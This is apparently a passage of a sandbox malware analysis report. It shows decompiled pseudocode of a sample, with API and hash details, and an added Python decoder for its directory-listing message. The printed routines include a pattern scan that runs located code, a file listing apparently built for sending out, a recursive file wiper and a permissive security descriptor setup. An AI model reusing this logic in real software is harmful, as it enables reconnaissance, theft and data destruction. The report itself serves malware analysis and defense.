                                                            																		if(_t174 < 6) {
                                                            																			continue;
                                                            																		}
                                                            																		break;
                                                            																	}
                                                            																	__eflags = _t174 - 6;
                                                            																	if(_t174 == 6) {
                                                            																		_t207 = _t218 + 0xffffffe8;
                                                            																		L89:
                                                            																		_t208 = _t207 + _t186;
                                                            																		__eflags = _t208;
                                                            																		goto L90;
                                                            																	} else {
                                                            																		goto L45;
                                                            																	}
                                                            																	goto L95;
                                                            																	L45:
                                                            																	_t218 = _t218 + 1;
                                                            																	__eflags = _t218 - _t198;
                                                            																} while (_t218 <= _t198);
                                                            																__eflags = _v8 ^ _t224;
                                                            																return E04655AFE(_v8 ^ _t224);
                                                            															}
                                                            														} else {
                                                            															_v16 = 0x4d8dc18b;
                                                            															_t200 =  &_v40;
                                                            															_v12 = 0x51ac;
                                                            															_v40 = 0xc085f633;
                                                            															_v36 = 0x379;
                                                            															_v24 = 0x85b04589;
                                                            															_v20 = 0x75c0;
                                                            															_v18 = 0x12;
                                                            															_v320 = 0x2c;
                                                            															__eflags = _t150 - 0x42ee;
                                                            															if(_t150 != 0x42ee) {
                                                            																__eflags = _t150 - 0x47ba;
                                                            																if(_t150 == 0x47ba) {
                                                            																	L20:
                                                            																	_v320 = 0x2e;
                                                            																} else {
                                                            																	__eflags = _t150 - 0x47bb;
                                                            																	if(_t150 == 0x47bb) {
                                                            																		goto L20;
                                                            																	}
                                                            																}
                                                            															} else {
                                                            																_t200 =  &_v16;
                                                            																_v320 = 0x18;
                                                            															}
                                                            															_t220 = 0;
                                                            															_t177 = _t157 + 0xfffffffa;
                                                            															__eflags = _t177;
                                                            															_v32 = _t177;
                                                            															do {
                                                            																_t178 = 0;
                                                            																asm("o16 nop [eax+eax]");
                                                            																while(1) {
                                                            																	_t135 = _t178 + _t220;
                                                            																	__eflags =  *((intOrPtr*)(_t135 + _t186)) -  *((intOrPtr*)(_t178 + _t200));
                                                            																	if( *((intOrPtr*)(_t135 + _t186)) !=  *((intOrPtr*)(_t178 + _t200))) {
                                                            																		break;
                                                            																	}
                                                            																	_t178 = _t178 + 1;
                                                            																	__eflags = _t178 - 6;
                                                            																	if(_t178 < 6) {
                                                            																		continue;
                                                            																	}
                                                            																	break;
                                                            																}
                                                            																__eflags = _t178 - 6;
                                                            																if(_t178 == 6) {
                                                            																	_t208 = _t220 - _v320 + _t186;
                                                            																	__eflags = _t208;
                                                            																} else {
                                                            																	goto L26;
                                                            																}
                                                            																L29:
                                                            																__eflags = _t208;
                                                            																if(_t208 != 0) {
                                                            																	L91:
                                                            																	 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                            																	 *_t208();
                                                            																} else {
                                                            																	__eflags = _t150 - 0x4a61;
                                                            																	if(_t150 == 0x4a61) {
                                                            																		_v32 = 0;
                                                            																		_t202 = _v324 + 0xfffffff9;
                                                            																		asm("o16 nop [eax+eax]");
                                                            																		do {
                                                            																			_t179 = 0;
                                                            																			__eflags = 0;
                                                            																			while(1) {
                                                            																				_t138 = _t179 + _t208;
                                                            																				__eflags =  *((intOrPtr*)(_t138 + _t186)) -  *((intOrPtr*)(_t224 + _t179 - 0x14));
                                                            																				if( *((intOrPtr*)(_t138 + _t186)) !=  *((intOrPtr*)(_t224 + _t179 - 0x14))) {
                                                            																					break;
                                                            																				}
                                                            																				_t179 = _t179 + 1;
                                                            																				__eflags = _t179 - 7;
                                                            																				if(_t179 < 7) {
                                                            																					continue;
                                                            																				}
                                                            																				break;
                                                            																			}
                                                            																			__eflags = _t179 - 7;
                                                            																			if(_t179 == 7) {
                                                            																				_t208 = _t208 + 0xffffffd8 + _t186;
                                                            																				__eflags = _t208;
                                                            																			} else {
                                                            																				goto L36;
                                                            																			}
                                                            																			L90:
                                                            																			if(__eflags != 0) {
                                                            																				goto L91;
                                                            																			}
                                                            																			goto L92;
                                                            																			L36:
                                                            																			_t208 = _t208 + 1;
                                                            																			__eflags = _t208 - _t202;
                                                            																		} while (_t208 <= _t202);
                                                            																		_t208 = _v32;
                                                            																		__eflags = _t208;
                                                            																		goto L90;
                                                            																	}
                                                            																}
                                                            																goto L92;
                                                            																L26:
                                                            																_t220 = _t220 + 1;
                                                            																__eflags = _t220 - _v32;
                                                            															} while (_t220 <= _v32);
                                                            															_t208 = 0;
                                                            															goto L29;
                                                            														}
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L95:
                                                            			}

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll,00000000), ref: 0463C9E6
                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0463CA12
                                                            • VirtualAlloc.KERNEL32(00000000,00000050,00003000,00000004,?,74CB43E0), ref: 0463CDEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressAllocHandleModuleProcVirtual
                                                            • String ID: .$Pjj$RtlGetVersion$j$ntdll
                                                            • API String ID: 3695083113-758095414
                                                            • Opcode ID: a1d0dc90d3eb7a1983d006851aa84237ddbd55341b3932762793dd085f3569b8
                                                            • Instruction ID: 8ff76876c04858b1f89ab4720dd547c2a885db59d2c917fd8bc04264492b428b
                                                            • Opcode Fuzzy Hash: a1d0dc90d3eb7a1983d006851aa84237ddbd55341b3932762793dd085f3569b8
                                                            • Instruction Fuzzy Hash: FCC10673A001988BDB28DF58C8947BDBBA0FF55311F2101AEE9567B381FA317946DB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			// Directory listing builder: enumerates "<_a4>\*.*", skips "." and "..",
                                                            			// and packs every other entry into a growable LocalAlloc buffer that starts
                                                            			// with the byte 'i' (0x69). The finished buffer, its length and the constant
                                                            			// 0x3f are then handed to E04631C60 through the context field at __ecx+4.
                                                            			E04634C20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				short _v1056;
                                                            				intOrPtr _v1624;
                                                            				struct _WIN32_FIND_DATAW _v1648;
                                                            				char _v1649;
                                                            				long _v1656;
                                                            				void* _v1660;
                                                            				intOrPtr _v1664;
                                                            				signed int _t47;
                                                            				void* _t54;
                                                            				signed int _t56;
                                                            				signed int _t57;
                                                            				signed int _t66;
                                                            				signed int _t67;
                                                            				intOrPtr _t83;
                                                            				void* _t84;
                                                            				intOrPtr _t85;
                                                            				intOrPtr* _t87;
                                                            				void* _t95;
                                                            				intOrPtr _t96;
                                                            				intOrPtr _t97;
                                                            				intOrPtr _t98;
                                                            				void* _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            				long _t104;
                                                            				void* _t106;
                                                            				signed int _t107;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            
                                                            				_t85 = __ecx;
                                                            				// /GS stack cookie: __security_cookie (0x4684008) ^ ebp, verified by E04655AFE on return
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t47 ^ _t107;
                                                            				_t83 = __ecx;
                                                            				_t104 = 0x2800; // current buffer capacity (10240 bytes), mirrored in _v1656
                                                            				_v1664 = __ecx;
                                                            				 *((intOrPtr*)(__ecx + 0x14)) = 0; // context field at +0x14 is reset; its meaning is not visible here
                                                            				_v1656 = 0x2800;
                                                            				wsprintfW( &_v1056, L"%s\\*.*", _a4); // search pattern "<dir>\*.*", wide, on the stack
                                                            				_t109 = _t108 + 0xc;
                                                            				_t54 = FindFirstFileW( &_v1056,  &_v1648);
                                                            				_v1660 = _t54;
                                                            				if(_t54 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                            					_t84 = LocalAlloc(0x40, 0x2800); // LPTR: fixed, zero-initialised
                                                            					_t100 = 1; // write cursor; offset 0 holds the header byte
                                                            					 *_t84 = 0x69; // message header 'i'
                                                            					do {
                                                            						// keep at least 0x410 bytes of headroom before writing a record; the
                                                            						// largest record is 1 + (MAX_PATH * 2 + 2) + 16 bytes, well under that
                                                            						_t14 = _t104 - 0x410; // 0x23f0
                                                            						if(_t100 > _t14) {
                                                            							_t104 = _t104 + 0x410;
                                                            							_v1656 = _t104;
                                                            							_t84 = LocalReAlloc(_t84, _t104, 0x42); // LMEM_MOVEABLE | LMEM_ZEROINIT
                                                            						}
                                                            						// inlined wcscmp(cFileName, L"."), two UTF-16 units per iteration;
                                                            						// _t57 == 0 on a match, so the record below is only written for other names
                                                            						_t87 = ".";
                                                            						_t56 =  &(_v1648.cFileName);
                                                            						while(1) {
                                                            							_t95 =  *_t56;
                                                            							if(_t95 !=  *_t87) {
                                                            								break;
                                                            							}
                                                            							if(_t95 == 0) {
                                                            								L10:
                                                            								_t57 = 0;
                                                            							} else {
                                                            								_t98 =  *((intOrPtr*)(_t56 + 2));
                                                            								_t18 = _t87 + 2; // 0x2e0000
                                                            								if(_t98 !=  *_t18) {
                                                            									break;
                                                            								} else {
                                                            									_t56 = _t56 + 4;
                                                            									_t87 = _t87 + 4;
                                                            									if(_t98 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L10;
                                                            									}
                                                            								}
                                                            							}
                                                            							L12:
                                                            							if(_t57 != 0) { // name is not "."
                                                            								// same inlined compare, this time against L".."
                                                            								_t66 = L"..";
                                                            								_t87 =  &(_v1648.cFileName);
                                                            								while(1) {
                                                            									_t96 =  *_t87;
                                                            									if(_t96 !=  *_t66) {
                                                            										break;
                                                            									}
                                                            									if(_t96 == 0) {
                                                            										L18:
                                                            										_t67 = 0;
                                                            									} else {
                                                            										_t97 =  *((intOrPtr*)(_t87 + 2));
                                                            										_t21 = _t66 + 2; // 0x2e
                                                            										if(_t97 !=  *_t21) {
                                                            											break;
                                                            										} else {
                                                            											_t87 = _t87 + 4;
                                                            											_t66 = _t66 + 4;
                                                            											if(_t97 != 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L18;
                                                            											}
                                                            										}
                                                            									}
                                                            									L20:
                                                            									if(_t67 != 0) { // neither "." nor "..": append a record at _t84 + _t100
                                                            										// record layout:
                                                            										//   u8   FILE_ATTRIBUTE_DIRECTORY bit only (0x10 directory, 0x00 file)
                                                            										//   wstr cFileName including the NUL terminator (E0465E060 is a dst/src/len copy helper)
                                                            										//   u32  nFileSizeHigh, then u32 nFileSizeLow (high dword first)
                                                            										//   u64  ftLastWriteTime: low dword at +8, dwHighDateTime (_v1624, struct offset +24) at +0xc
                                                            										 *(_t100 + _t84) = _v1648.dwFileAttributes & 0x00000010;
                                                            										_t101 = _t100 + 1;
                                                            										_t106 = 2 + lstrlenW( &(_v1648.cFileName)) * 2;
                                                            										E0465E060(_t101 + _t84,  &(_v1648.cFileName), _t106);
                                                            										_t102 = _t101 + _t106;
                                                            										_t104 = _v1656;
                                                            										_t109 = _t109 + 0xc;
                                                            										 *((intOrPtr*)(_t102 + _t84)) = _v1648.nFileSizeHigh;
                                                            										 *((intOrPtr*)(_t102 + _t84 + 4)) = _v1648.nFileSizeLow;
                                                            										 *((intOrPtr*)(_t102 + _t84 + 8)) = _v1648.ftLastWriteTime;
                                                            										 *((intOrPtr*)(_t102 + _t84 + 0xc)) = _v1624;
                                                            										_t100 = _t102 + 0x10; // 16 fixed bytes per record after the name
                                                            									}
                                                            									goto L22;
                                                            								}
                                                            								asm("sbb eax, eax");
                                                            								_t67 = _t66 | 0x00000001;
                                                            								goto L20;
                                                            							}
                                                            							goto L22;
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t57 = _t56 | 0x00000001;
                                                            						goto L12;
                                                            						L22:
                                                            					} while (FindNextFileW(_v1660,  &_v1648) != 0);
                                                            					// hand the constant 0x3f, the length _t100 and the buffer _t84 (register-passed;
                                                            					// the decompiler did not resolve it) to E04631C60 through the context field at +4
                                                            					_push(_t87);
                                                            					_push(0x3f);
                                                            					_push(_t100);
                                                            					E04631C60( *((intOrPtr*)(_v1664 + 4)));
                                                            					LocalFree(_t84);
                                                            					FindClose(_v1660);
                                                            					return E04655AFE(_v12 ^ _t107, _t84); // stack cookie check
                                                            				} else {
                                                            					// FindFirstFileW failed: the same call is made with a one-byte body 'i'
                                                            					_push(_t85);
                                                            					_push(0x3f);
                                                            					_push(1);
                                                            					_v1649 = 0x69;
                                                            					E04631C60( *((intOrPtr*)(_t83 + 4)));
                                                            					return E04655AFE(_v12 ^ _t107,  &_v1649);
                                                            				}
                                                            			}

                                                            Instruction addresses for E04634C20 (per-line address column of the listing above): 0x04634c20 - 0x04634e2a; the 0x00000000 entries are decompiler-synthesised lines with no address of their own.

                                                            APIs
                                                            • wsprintfW.USER32 ref: 04634C60
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 04634C77
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 04634CBD
                                                            • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04634CEA
                                                            • lstrlenW.KERNEL32(?), ref: 04634D82
                                                            • FindNextFileW.KERNEL32(?,?), ref: 04634DE2
                                                            • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F), ref: 04634E06
                                                            • FindClose.KERNEL32(?), ref: 04634E12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                            • String ID: %s\*.*$i
                                                            • API String ID: 4084865168-1236837797
                                                            • Opcode ID: 5f81c4c8cabfb8ce687aa6a28195922ee7c5c30ef6711d5cff2ce118030d079a
                                                            • Instruction ID: 22ca6763072a7d19bf4688b25589d5bbcc64fe6e36b4d41a2297bff148ed69e2
                                                            • Opcode Fuzzy Hash: 5f81c4c8cabfb8ce687aa6a28195922ee7c5c30ef6711d5cff2ce118030d079a
                                                            • Instruction Fuzzy Hash: B351F571A00118ABDB20DF24DC84BEAB7BAEF64715F4041A5E50DD7241FB36AA90CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
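
The listing that E04634C20 assembles has a fixed shape: a header byte 'i', then per entry one attribute byte, a NUL-terminated UTF-16LE name, nFileSizeHigh, nFileSizeLow and the 8-byte ftLastWriteTime. The following Python encoder/decoder is an added example, not code from the Joe Sandbox report or from the sample; it reads that layout off the decompilation so a captured message body can be decoded during incident response. It assumes that E04631C60 transmits the buffer (the report does not show that function), that the 0x3f pushed alongside it is a message type, and the field names and sample entries are constructed for illustration.

```python
"""Encoder/decoder for the directory-listing message built by E04634C20.

Added example, not code from the report or the sample. Layout as read from
the decompilation:
    byte   0x69 ('i')                          message header
    per entry ("." and ".." are skipped):
      u8     dwFileAttributes & 0x10           0x10 directory, 0x00 file
      wstr   cFileName, UTF-16LE, NUL-terminated
      u32    nFileSizeHigh
      u32    nFileSizeLow
      u64    ftLastWriteTime (FILETIME, low dword first)
Assumptions (mine, not shown by the report): E04631C60 sends this buffer and
the constant 0x3f is a message type; the field names below are mine.
"""
import struct
from datetime import datetime, timedelta, timezone

HEADER = 0x69
FILE_ATTRIBUTE_DIRECTORY = 0x10
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime (microsecond precision)."""
    return ((dt - _FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def build_listing(entries) -> bytes:
    """Serialise (name, is_dir, size, mtime) tuples the way the sample does."""
    out = bytearray([HEADER])
    for name, is_dir, size, mtime in entries:
        if name in (".", ".."):          # the two inlined wcscmp loops
            continue
        out.append(FILE_ATTRIBUTE_DIRECTORY if is_dir else 0)
        out += name.encode("utf-16-le") + b"\x00\x00"
        out += struct.pack("<IIQ", size >> 32, size & 0xFFFFFFFF,
                           datetime_to_filetime(mtime))
    return bytes(out)


def parse_listing(blob: bytes) -> list:
    """Decode a captured listing; raises ValueError on anything malformed."""
    if not blob or blob[0] != HEADER:
        raise ValueError("missing 'i' header")
    entries, pos = [], 1
    while pos < len(blob):
        attr = blob[pos]
        pos += 1
        start = pos
        # Scan the name two bytes at a time: a naive search for b"\x00\x00"
        # would stop early inside "aĀ" (61 00 00 01), which is not a terminator.
        while pos + 1 < len(blob) and blob[pos:pos + 2] != b"\x00\x00":
            pos += 2
        if pos + 1 >= len(blob):
            raise ValueError("unterminated name")
        name = blob[start:pos].decode("utf-16-le")
        pos += 2
        if pos + 16 > len(blob):
            raise ValueError("truncated fixed fields")
        size_hi, size_lo, ft = struct.unpack_from("<IIQ", blob, pos)
        pos += 16
        entries.append({
            "name": name,
            "is_dir": bool(attr & FILE_ATTRIBUTE_DIRECTORY),
            "size": (size_hi << 32) | size_lo,
            "mtime": filetime_to_datetime(ft),
        })
    return entries


# Constructed sample input (not from the report): the FindFirstFileW/FindNextFileW
# sequence for a directory holding one file and one subdirectory.
SAMPLE_ENTRIES = [
    (".", True, 0, datetime(2022, 9, 1, tzinfo=timezone.utc)),
    ("..", True, 0, datetime(2022, 9, 1, tzinfo=timezone.utc)),
    ("report.docx", False, (1 << 32) + 0x10,
     datetime(2022, 9, 1, 12, 30, 0, tzinfo=timezone.utc)),
    ("aĀ", True, 0, datetime(2021, 1, 2, 3, 4, 5, 678900, tzinfo=timezone.utc)),
]
SAMPLE_LISTING = build_listing(SAMPLE_ENTRIES)

if __name__ == "__main__":
    for entry in parse_listing(SAMPLE_LISTING):
        print(entry)
```

parse_listing expects the decoded message body, i.e. whatever E04631C60 would have put on the wire after its own framing or encryption, starting at the 'i' byte; a body consisting only of 'i' (the FindFirstFileW-failed branch) decodes to an empty list.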

                                                            C-Code - Quality: 55%
                                                            			// Recursive directory wipe: for every entry under _a4 except "." and "..",
                                                            			// DeleteFileW for files and a recursive call for anything carrying
                                                            			// FILE_ATTRIBUTE_DIRECTORY. Only bit 0x10 is tested, so directory junctions
                                                            			// and symbolic links (which also carry FILE_ATTRIBUTE_REPARSE_POINT) are
                                                            			// descended into rather than skipped.
                                                            			E04634E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
                                                            				signed int _v12;
                                                            				short _v1056;
                                                            				short _v2096;
                                                            				struct _WIN32_FIND_DATAW _v2688;
                                                            				intOrPtr _v2692;
                                                            				signed int _t26;
                                                            				signed int _t33;
                                                            				signed int _t34;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				void* _t54;
                                                            				intOrPtr* _t56;
                                                            				intOrPtr* _t59;
                                                            				void* _t63;
                                                            				void* _t64;
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t66;
                                                            				void* _t68;
                                                            				WCHAR* _t70;
                                                            				signed int _t71;
                                                            				void* _t72;
                                                            				void* _t73;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t26 ^ _t71;
                                                            				_t70 = _a4;
                                                            				_t68 = wsprintfW;
                                                            				_v2692 = __ecx;
                                                            				wsprintfW( &_v2096, L"%s\\*.*", _t70);
                                                            				_t73 = _t72 + 0xc;
                                                            				_t54 = FindFirstFileW( &_v2096,  &_v2688);
                                                            				if(_t54 != 0xffffffff) {
                                                            					do {
                                                            						_t56 = ".";
                                                            						_t33 =  &(_v2688.cFileName);
                                                            						while(1) {
                                                            							_t63 =  *_t33;
                                                            							if(_t63 !=  *_t56) {
                                                            								break;
                                                            							}
                                                            							if(_t63 == 0) {
                                                            								L7:
                                                            								_t34 = 0;
                                                            							} else {
                                                            								_t66 =  *((intOrPtr*)(_t33 + 2));
                                                            								_t10 = _t56 + 2; // 0x2e0000
                                                            								if(_t66 !=  *_t10) {
                                                            									break;
                                                            								} else {
                                                            									_t33 = _t33 + 4;
                                                            									_t56 = _t56 + 4;
                                                            									if(_t66 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L7;
                                                            									}
                                                            								}
                                                            							}
                                                            							L9:
                                                            							if(_t34 != 0) {
                                                            								_t59 = L"..";
                                                            								_t41 =  &(_v2688.cFileName);
                                                            								while(1) {
                                                            									_t64 =  *_t41;
                                                            									if(_t64 !=  *_t59) {
                                                            										break;
                                                            									}
                                                            									if(_t64 == 0) {
                                                            										L15:
                                                            										_t42 = 0;
                                                            									} else {
                                                            										_t65 =  *((intOrPtr*)(_t41 + 2));
                                                            										_t13 = _t59 + 2; // 0x2e
                                                            										if(_t65 !=  *_t13) {
                                                            											break;
                                                            										} else {
                                                            											_t41 = _t41 + 4;
                                                            											_t59 = _t59 + 4;
                                                            											if(_t65 != 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L15;
                                                            											}
                                                            										}
                                                            									}
                                                            									L17:
                                                            									if(_t42 != 0) {
                                                            										_push( &(_v2688.cFileName));
                                                            										_push(_t70);
                                                            										_push(L"%s\\%s");
                                                            										_push( &_v1056);
                                                            										if((_v2688.dwFileAttributes & 0x00000010) == 0) {
                                                            											wsprintfW();
                                                            											_t73 = _t73 + 0x10;
                                                            											DeleteFileW( &_v1056);
                                                            										} else {
                                                            											wsprintfW();
                                                            											_t73 = _t73 + 0x10;
                                                            											E04634E30(_t54, _v2692, _t68, _t70,  &_v1056);
                                                            										}
                                                            									}
                                                            									goto L21;
                                                            								}
                                                            								asm("sbb eax, eax");
                                                            								_t42 = _t41 | 0x00000001;
                                                            								goto L17;
                                                            							}
                                                            							goto L21;
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t34 = _t33 | 0x00000001;
                                                            						goto L9;
                                                            						L21:
                                                            					} while (FindNextFileW(_t54,  &_v2688) != 0);
                                                            					FindClose(_t54);
                                                            					RemoveDirectoryW(_t70);
                                                            					return E04655AFE(_v12 ^ _t71);
                                                            				} else {
                                                            					return E04655AFE(_v12 ^ _t71);
                                                            				}
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2470771279-1665845743
                                                            • Opcode ID: f74fba9e2bdca98d4cc5e31ab7cb31f4714c052cfbefd706b458252e08fd835e
                                                            • Instruction ID: 77df285a332173d350ebfe75680efaa7b8c9c629960bb7c67fa1aa4ded346699
                                                            • Opcode Fuzzy Hash: f74fba9e2bdca98d4cc5e31ab7cb31f4714c052cfbefd706b458252e08fd835e
                                                            • Instruction Fuzzy Hash: 5641F6716002189ADB10AF74DC44AFAB3BDEF65325F4544A9D90AD3205FF32FA84CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E0463AE60(void* __ebx, void* __edi, void* __esi, struct _SECURITY_DESCRIPTOR* _a4) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                            				void* _v20;
                                                            				struct _SECURITY_DESCRIPTOR* _v24;
                                                            				signed int _t16;
                                                            				struct _SECURITY_DESCRIPTOR* _t18;
                                                            				void* _t20;
                                                            				long _t38;
                                                            				long _t46;
                                                            				void* _t48;
                                                            				signed int _t49;
                                                            
                                                            				_t16 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t16 ^ _t49;
                                                            				_t18 = _a4;
                                                            				_t48 = 0;
                                                            				_v24 = _t18;
                                                            				_v20 = 0;
                                                            				_t46 = 0;
                                                            				_v16.Value = 0;
                                                            				_v12 = 0x100;
                                                            				if(InitializeSecurityDescriptor(_t18, 1) != 0 && AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
                                                            					_t10 = GetLengthSid(_v20) + 0x10; // 0x10
                                                            					_t38 = _t10;
                                                            					_t48 = RtlAllocateHeap(GetProcessHeap(), 8, _t38);
                                                            					if(_t48 != 0 && InitializeAcl(_t48, _t38, 2) != 0 && AddAccessAllowedAce(_t48, 2, 0x10000000, _v20) != 0) {
                                                            						SetSecurityDescriptorDacl(_v24, 1, _t48, 0);
                                                            						_t46 =  !=  ? 1 : 0;
                                                            					}
                                                            				}
                                                            				_t20 = _v20;
                                                            				if(_t20 != 0) {
                                                            					FreeSid(_t20);
                                                            				}
                                                            				if(_t46 != 0) {
                                                            					return E04655AFE(_v8 ^ _t49);
                                                            				} else {
                                                            					if(_t48 != 0) {
                                                            						HeapFree(GetProcessHeap(), _t46, _t48);
                                                            					}
                                                            					return E04655AFE(_v8 ^ _t49);
                                                            				}
                                                            			}

                                                            APIs
                                                            • InitializeSecurityDescriptor.ADVAPI32(0463B60D,00000001,74D0F560,74CB6490), ref: 0463AE8F
                                                            • AllocateAndInitializeSid.ADVAPI32(0463B58F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0463AEAB
                                                            • GetLengthSid.ADVAPI32(00000000,74CB6620), ref: 0463AEB9
                                                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0463AEC5
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0463AECC
                                                            • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 0463AEDC
                                                            • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 0463AEF1
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 0463AF02
                                                            • FreeSid.ADVAPI32(00000000), ref: 0463AF1B
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0463AF2B
                                                            • HeapFree.KERNEL32(00000000), ref: 0463AF32
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Initialize$AllocateDescriptorFreeProcessSecurity$AccessAllowedDaclLength
                                                            • String ID:
                                                            • API String ID: 629205620-0
                                                            • Opcode ID: d714ce62c3711784a479d714f8fd8d1251796b258d182c0ef0ed896600ac20e4
                                                            • Instruction ID: e89430e9bef18c0b6875781aaf1fb8bffedce480a3119a16db030ae60511328e
                                                            • Opcode Fuzzy Hash: d714ce62c3711784a479d714f8fd8d1251796b258d182c0ef0ed896600ac20e4
                                                            • Instruction Fuzzy Hash: F0314CB1A00218ABDB24DFA59C4DFBFBBBCEF54741F005029B905E2281EF759D009BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E046445C0(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				short _v16;
                                                            				char _v536;
                                                            				WCHAR* _v540;
                                                            				WCHAR* _v544;
                                                            				signed int _t35;
                                                            				char* _t41;
                                                            				WCHAR* _t46;
                                                            				short _t49;
                                                            				short _t50;
                                                            				WCHAR* _t51;
                                                            				long _t53;
                                                            				signed int _t56;
                                                            				signed int _t63;
                                                            				long _t64;
                                                            				WCHAR* _t68;
                                                            				long _t70;
                                                            				WCHAR* _t74;
                                                            				signed int _t76;
                                                            				void* _t98;
                                                            				WCHAR* _t101;
                                                            				void* _t104;
                                                            				long _t105;
                                                            				WCHAR* _t106;
                                                            				signed int _t107;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            				void* _t110;
                                                            				void* _t111;
                                                            				long _t115;
                                                            
                                                            				_t98 = __edi;
                                                            				_t35 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t35 ^ _t107;
                                                            				_t104 = __ecx;
                                                            				_v540 = __edx;
                                                            				E0465DEA0(__edi, __edx, 0, 0x208);
                                                            				E0465DEA0(_t98,  &_v536, 0, 0x208);
                                                            				_t109 = _t108 + 0x18;
                                                            				_t41 =  &_v536;
                                                            				__imp__GetProcessImageFileNameW(_t104, _t41, 0x104);
                                                            				if(_t41 == 0) {
                                                            					L16:
                                                            					__eflags = _v8 ^ _t107;
                                                            					return E04655AFE(_v8 ^ _t107);
                                                            				} else {
                                                            					_push(_t98);
                                                            					_t105 = GetLogicalDriveStringsW(0, 0);
                                                            					_t115 = _t105;
                                                            					if(_t115 == 0) {
                                                            						L15:
                                                            						goto L16;
                                                            					} else {
                                                            						_t5 = _t105 + 1; // 0x1
                                                            						_push(__ebx);
                                                            						_push( ~(_t115 > 0) | _t5 * 0x00000002);
                                                            						_t46 = L04655B55( ~(_t115 > 0) | _t5 * 0x00000002, _t105, _t115);
                                                            						_t86 = 2 + _t105 * 2;
                                                            						_t74 = _t46;
                                                            						_v544 = _t74;
